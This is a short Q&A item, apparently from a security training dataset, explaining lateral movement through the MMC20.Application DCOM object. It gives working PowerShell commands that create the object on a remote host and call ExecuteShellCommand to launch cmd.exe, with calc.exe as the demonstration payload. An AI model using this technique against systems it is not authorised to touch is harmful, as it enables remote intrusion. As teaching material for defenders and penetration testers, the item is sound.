How can an attacker execute a program on a remote system using the MMC20.Application DCOM object?
An attacker first creates a DCOM instance of `MMC20.Application` on the remote machine using PowerShell: `$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","targetIP"))`. Then they call the `ExecuteShellCommand` method to launch a program, e.g., `$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")`. This requires administrative credentials and is most effective when the firewall is disabled or bypassed. See Domain Penetration - Executing Programs on Remote Systems Using DCOM for full details.
MMC20.Application, ExecuteShellCommand, DCOM, PowerShell, remote code execution